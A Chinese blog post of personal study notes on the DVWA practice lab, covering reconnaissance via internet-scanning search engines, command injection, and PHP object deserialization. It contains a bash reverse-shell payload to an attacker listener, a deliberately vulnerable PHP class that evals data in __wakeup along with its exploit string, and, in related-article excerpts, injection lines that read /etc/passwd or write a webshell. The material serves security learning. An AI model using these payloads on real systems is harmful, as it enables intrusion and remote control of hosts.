信息收集&命令注入&反序列化(dvwa)

最新推荐文章于 2024-11-20 15:41:49 发布
最新推荐文章于 2024-11-20 15:41:49 发布
阅读量828 收藏
点赞数
分类专栏: 随笔 网络安全 文章标签: 安全 linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/u010930278/article/details/110097457
版权

信息收集

zoomeye 钟馗之眼
shodan 撒旦
fofa
采用hash搜索标签页上面的小图片
http.favicon.hash:-842852785

命令注入

dvwa的命令执行漏洞利用
测试是否存在命令注入

127.0.0.1 | winver

反弹shell
kali监听7777端口 nc -lvp 7777
注:测试环境Ubuntu虚拟机
dvwa命令注入输入 ;bash -i >& /dev/tcp/kali的ip地址/7777 0>&1

反序列化(对象注入)

<?php 
	class FXLH{
		var $h='abc';
		function __wakeup(){
			@eval($this->h);
		}
	}
	$f = new FXLH;
	$f2 = serialize($f);
	print_r($f2);
	$o = $_GET['fxlh'];
	$f3 = unserialize($o);
	print_r($f3);
	
?>
<!-- 上面是复现 -->
<!-- 下面是利用 -->
?fxlh=O:4:"FXLH":1:{s:1:"h";s:10:"phpinfo();";}

序列化就是把内存的东西放硬盘里让它sleep,内存比较贵
反序列化就是把之前放硬盘里的东西扔回内存让它wakeup
__函数名 魔数
构造函数
析构函数
原理是变量覆盖

写代码的核心思想就是能复制就复制

红队攻防文库
善恶终有报,天道好轮回;不信抬头看,苍天饶过谁
08-23 639
各家兴便是天下大同
序列化与反序列化(serialVersionUID)
WatchAnglevel的博客
12-24 568
序列化与反序列化基本用法,注意事项,以及使用IEDA创建serialVersionUID。
手把手教你搭建web练习常用靶场-DVWA/phpMyAdmin/PHP反序列化/sqli-labs/upload/pikachu/--超详细教程!!!
九尾ww的博客
11-20 1152
把文件放到www目录下,然后config.sample.inc.php文件名改为config.inc.php。然后在浏览器新建一个页面,输入localhost或者127.0.0.1在后面加上自己的文件名。然后在浏览器新建一个页面,输入localhost或者127.0.0.1在后面加上自己的文件名。在浏览器新建一个页面,输入localhost或者127.0.0.1在后面加上自己的文件名。然后打开小皮的数据库,新建数据库,改成和上面的一样的用户名密码。把下载解压好的文件放到www目录下。
day2-dvwa命令执行漏洞代码审计&PHP反序列化
m0_70099896的博客
11-21 342
php反序列化漏洞,是手工测试不出来的,只能通过代码审计漏洞原因是因为没有对用户上传的代码进行审核过滤或者魔法函数中存在危险的动作能够被用户的代码调用。
序列化和反序列化
jialanshun的博客
12-14 400
1.概念: 序列化: 将数据结构或对象转换成二进制串的过程。 反序列化:将在序列化过程中所生成的二进制串转换成数据结构或者对象的过程。 只有实现了Serializable或Externalizable接口的类的对象才能被序列化,否则抛出异常 2:为什么要序列化和反序列化 我们知道,当两个进程进行远程通信时,可以相互发送各种类型的数据,包括文本、图片、音频、视频等, 而这些数据都会以二
网安学习——信息收集
haoaaao的博客
02-12 2833
一、架构、搭建、waf
Web安全第2讲 - 信息收集 - shodan
Yauger的博客
02-08 296
一、shodan 1.1 信息收集方式: 主动信息收集:直接与目标进行交互,通过对交互过程中的信息进行收集 被动信息收集:通过第三方引擎与目标交互,或不予目标交互查询数据库,获得目标的信息 1.2 shodan搜索引擎介绍 虽然目前人们都认为谷歌是最强的搜索引擎,但shodan才是互联网上最可怕的搜索引擎。与谷 歌不同的是,shodan不是在网上搜索网址,而是直接进入互联网的背后通道。shod...
关于命令执行与反序列化
vvoennvv的博客
11-10 222
Impossible级别的代码加入了Anti-CSRF token,同时对参数ip进行了严格的限制,只有诸如“数字.数字.数字.数字”的输入才会被接收执行,因此不存在命令注入漏洞。当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。然后我们将这串值中的可控变量替换为我们的攻击代码,(即得到序列化值,将正常的值替换为攻击代码,让之后执行替换的攻击代码)
安全编程与审计】:在DVWA中学习如何避免命令注入攻击
本文首先介绍了命令注入攻击的基础知识,随后探讨了DVWA(Damn Vulnerable Web Application)平台在安全编程方面的应用。文章详细分析了命令注入的攻击机制,包括攻击原理和常见的攻击向量,同时强调了编写安全代码...
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 8152
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-优快云博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3531
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
渗透测试全流程
Wrop的博客
07-11 1107
本文介绍了渗透测试的全流程,包括信息收集、漏洞扫描、漏洞利用、内网转发、横向移动、权限维持、痕迹删除
安全反序列化(php&java)及漏洞复现
weixin_58954236的博客
09-06 1688
class Stu{在unserialize文件夹下新建一个stu.class.php文件,将上述代码复制进去。class(关键字:类),stu是类名。
反序列化漏洞总结
dreamthe的博客
11-24 3547
1.了解序列化和反序列化 在学习反序列化漏洞之前,需要了解什么是反序列化和序列化,我看到了一个很好的比喻,觉得很适合帮助大家对于两者理解,相信大家都在淘宝买过东西,不知道有没有买过那种小型家具,我有买过鞋柜,商家发货的时候不会将一个完好的鞋柜寄给你,第一因为中途可能会损坏,第二呢就是增加包装成本。所以商家都会将鞋柜所有部件打包寄过来,顾客拿到快递在自己根据安装教程安装好鞋柜。那么这里面就有两个过程,一个是商家将所以部件打包发走,一个是你拿到安装还原。那么序列化就是商家打包过程,反序列化就是将商品还原过程。
WEB漏洞靶场的搭建DVWA(一)
qq_59611876的博客
12-14 1217
带大家快速了解以及实战WEB渗透测试
审计dvwa中高难度命令执行代码 演示无回显如何渗透 编写php实现反序列化魔法函数自动调用计算器 什么是php反序列化漏洞
qq_63074316的博客
11-21 677
序列化本意是保证编写的代码能够在互联网完整的传输个人理解:序列化和反序列化本身不存在漏洞 之所以有是由于开发者在编写时加入了恶意的代码记住链式调用!!a套b b套危险函数 魔法函数引用a 从而触发危险函数 以此引发反序列化漏洞网完整的传输a套b b套危险函数 魔法函数引用a 从而触发危险函数 以此引发反序列化漏洞chatgpt:PHP反序列化漏洞是一种存在于应用程序中的安全漏洞,它允许攻击者通过发送恶意构造的序列化数据来控制程序的行为,从而实现代码执行、数据库操作等攻击目的。
DVWA 命令注入
qq_41326328的博客
03-12 1253
DVWA 命令注入 实验 首先我们探讨一下 什么叫命令注入,指的是利用没有验证过的恶意命令或代码,对网站或者服务器进行渗透攻击。 注入有很多种,并不仅仅是SQL注入。比如: 命令注入(Command injection) Eval注入(Eval injection) 客户端脚本攻击(Script insertion) 跨网站脚本攻击(Cross Site Scripting,XSS) SQL注入...
DVWA靶场之Command Injection(命令执行)
m0_65712192的博客
11-09 1158
DVWA靶场之Command Injection(命令执行)
CTF题目记录3(二次编码,反序列化
kkzzjx
05-15 1924
miniL被虐了QAQ太菜惹555 有精通php反序列化的旁友可以暗搓搓交换下思路 PHP2 (攻防世界) Can you anthenticate to this website? 其他什么都没有 index.phps源码泄露(记在小本本上,Phps是php的源码) 好脑洞 &lt;?php if("admin"===$_GET[id]) { echo("&lt;p&gt;not allowed!&lt;/p&gt;"); exit(); } $_GET[id] = urldecode($_G
dvwa命令注入
最新发布
03-18
&lt;think&gt;好的,我现在需要处理用户关于DVWA命令注入漏洞的查询,包括示例和防御方法。首先,我需要回顾一下命令注入的基本概念以及DVWA中的相关设置。根据用户提供的引用内容,DVWA在低安全级别下没有防护措施,攻击者可以执行任意系统命令,这可能导致严重的安全问题。 接下来,我应该整理漏洞的示例。用户提供的引用中提到了一些具体的例子,比如查看系统文件、显示当前路径和写入文件。需要将这些例子用清晰的中文描述出来,并确保代码部分符合LaTeX格式要求。同时,注意用户提到的系统级指令,比如行内数学表达式用$...$,独立公式用$$...$$,但这里可能更多涉及代码块,所以需要正确使用代码块格式。 然后是关于防御方法的部分。引用3中提到禁用危险函数、输入过滤、参数转义和使用替代方法。需要将这些点分条列出,并确保每个防御方法都有对应的解释,可能还需要引用对应的引用来源。 用户还要求生成相关问题,我需要思考与DVWA命令注入相关的其他问题,比如如何检测漏洞、不同安全级别的区别、实际案例等。这些问题应该能够帮助用户进一步深入学习。 需要注意引用的正确使用,在回答中提到的每个示例或防御方法后,自然地添加引用标识,例如[^1]、[^2]或[^3]。同时,检查LaTeX语法是否正确,虽然这里可能更多是代码块而非数学公式,但如果有数学表达式的话要正确应用格式。 最后,确保回答结构清晰,符合用户要求的可见层结构,分步骤解释漏洞示例和防御方法,保持语言口语化,避免使用专业术语过多,必要时进行解释。同时,验证引用的信息是否准确,确保示例和防御方法与提供的引用内容一致,避免错误信息&lt;/think&gt;### DVWA命令注入漏洞解析 #### 一、漏洞示例(DVWA Low安全级别) 1. **执行系统命令** 攻击者可注入`&amp;&amp;`或`|`拼接恶意命令: ```bash # 查看系统hosts文件 &amp;&amp; type c:\windows\system32\drivers\etc\hosts # 显示当前路径 | cd # 写入Webshell &amp;&amp; echo &quot;&lt;?php phpinfo();?&gt;&quot; &gt; D:\xampp\htdocs\shell.php ``` 2. **命令链利用** Windows/Linux通用语法: ```bash # Linux查看用户列表 ; cat /etc/passwd # Windows创建文件 &amp; echo test &gt; C:\hack.txt [^2] ``` #### 二、防御方法 1. **禁用危险函数** 在`php.ini`中禁用高危函数: ```ini disable_functions = system, exec, shell_exec, passthru ``` 2. **输入过滤机制** 使用正则表达式过滤特殊字符: ```php $input = preg_replace(&#39;/[;&amp;|]/&#39;, &#39;&#39;, $_GET[&#39;cmd&#39;]); [^3] ``` 3. **参数转义处理** 对参数进行引号包裹和转义: ```php $cmd = escapeshellarg($_GET[&#39;cmd&#39;]); system(&quot;ping -n 3 &quot; . $cmd); ``` 4. **使用安全替代方案** 改用非命令执行方式实现功能,例如PHP内置的`file_get_contents()`代替`cat`命令。 #### 三、渗透测试验证流程 1. 写入文件后访问`http://靶机地址/shell.php`验证Webshell 2. 检查系统进程列表确认命令执行效果: ```bash &amp;&amp; tasklist /V ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值